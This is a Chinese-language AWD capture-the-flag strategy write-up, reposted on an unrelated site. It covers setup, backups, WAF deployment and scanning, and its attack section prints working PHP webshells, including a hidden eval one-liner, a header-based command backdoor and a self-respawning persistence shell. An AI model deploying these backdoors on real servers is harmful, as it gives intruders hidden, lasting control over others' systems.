awd赛后总结 |
您所在的位置:网站首页 › gucs下跌严重 › awd赛后总结 |
最近参加了国赛分区赛,我所在的分区正好是awd赛制,所以总结了下关于awd的基操,方便新手入门 简单来说就是三步 登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出) 登录ssh->dump源码->D盾去后门->一人写批量脚本,一个人去修->部署waf,流量监控 控制npc->加固npc(拿到别人的靶机也是一样),紧盯流量 下面来详细介绍具体流程 1.登录比赛平台,查看比赛信息这此国赛主办方没有ssh密码,而是提供rsa公私钥,使用ssh-key方式进行登录 连接方法和密码方式相似,只不过是选择密钥而不用输入密码 如果主办方平台给的密码较为简单存在弱口令或者可能被爆破成功的机会,尽快修改密码,密码主要是三个方面 linux修改ssh即本地密码 passwd 修改后台登录密码 mysql -u root -p show databases; use test; show tables; select * from admin; updata admin set user pass='123456'; //updata 表名 set 字段名 = ‘值’; flush privileges; 修改mysql登录密码 方法一: mysql>set password for root@localhost =password('ocean888'); config.php文件中是有数据库的连接信息,执行完上条命令后更改此文件 方法二: mysqladmin -uroot -p 123456 password 123 root=用户名; 123456=旧密码; 123=新密码; 2.dump源码使用ssh工具保留源码,复制两份,用d盾去扫一份 注意:如果使用tar命令打包文件夹,.index.php(隐藏类型文件)将不会被打包 或者使用scp命令,后续会详细介绍使用方法 数据库操作数据库备份 登录数据库,命令备份数据库 mysqldump -u db_user -p db_passwd db_name > 1.sql //备份指定数据库 cd /var/lib/mysql mysqldump -u db_user -p db_passwd > 1.sql //先进入数据库目录再备份 mysqldump --all-databases > 1.sql //备份所有数据库 数据库还原 mysql -u db_user -p db_passwd db_name < 1.sql //还原指定数据库 cd /var/lib/mysql mysql -u db_user db_passwd < 1.sql //先进入数据库目录再还原 3.站点防御部署check:查看是否留有后门账户 关注是否运行了“特殊”进程 是否使用命令匹配一句话 关闭不必要端口,如远程登陆端口,木马端口 action:d盾扫描删除预留后门文件,代码审计工具审计 流量监控脚本部署 WAF脚本部署 挂waf: 注:如果挂了waf出现持续扣分,waf去掉 每个文件前边加 require_once(waf.php); 改 .user.ini配置文件 auto_prepend_file=; 包含在文件头 auto_append_file=; 包含在文件尾 文件监控脚本部署 注意:现上好waf再上文件监控 靶机没有python的话要先安python(视情况而定) 4.利用漏洞进行得分利用漏洞进行既包括自己去审计挖掘漏洞,也包括看流量分析出其他师傅发现的漏洞的复现 5.编写脚本批量拿分通过预留后门批量拿分 批量修改ssh账号密码 通过脚本批量获取flag 脚本批量提交flag 以上就是简单来说awd开局需要做的5件事,一下从攻击和防御两个方面来具体介绍awd玩法 攻击服务发现使用nmap对c段或端口进行扫描(看主办方给的靶机情况而定) nmap知道IP地址扫端口 .\nmap 10.241.180.159 -p1-65535扫C段 .\nmap 10.241.180.159/24根据ip列表扫,有一个ip地址列表,将这个保存为一个txt文件,和namp在同一目录下,扫描这个txt内的所有主机 nmap -iL ip.txtnmap扫描完毕后,win按住alt键 只提取端口 漏洞利用如果存在命令执行漏洞,可以通过命令执行执行上传一句话木马,直接用py脚本批量传,美哉 echo PD9waHAgZXZhbCgkX1JFUVVFU1RbJzEnXSk7ID8+Cg==|base64 -d>>.index.php # 过盾一句话可以改造成header返回的马,可以把这个一句话木马放到index.php中,直接访问index.php,从header中拿到flag,既不容易被发现马,又不容易被其他队利用 $a=1;$b="a=".$_GET['a'];parse_str($b);$k=(`$a`);header('cookie:'.$k); 权限维持不死马php file_put_contents file_put_contents('.1ndex.php',base64_decode('PD9waHAgIAogICAgc2V0X3RpbWVfbGltaXQoMCk7ICAKICAgIGlnbm9yZV91c2VyX2Fib3J0KDEpOyAgCiAgICB1bmxpbmsoX19GSUxFX18pOyAgCiAgICB3aGlsZSgxKXsgIAogICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCcubG5kZXgucGhwJywnPD9waHAgaWYobWQ1KCRfR0VUWyJwYXNzIl0pPT0iNTAxNjBjMmVjNGY0MGQ3M2Y5MDYxZjg5NjcxMjExNTciKXtAZXZhbCgkX1BPU1RbImNtZCJdKTt9ID8+Jyk7ICAKICAgICAgICBzbGVlcCgwKTsgIAogICAgfQo/Pg==')); post:cmd=system("ls"); linux命令不死马 while true;do echo '' > x.php;sleep 1;done |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |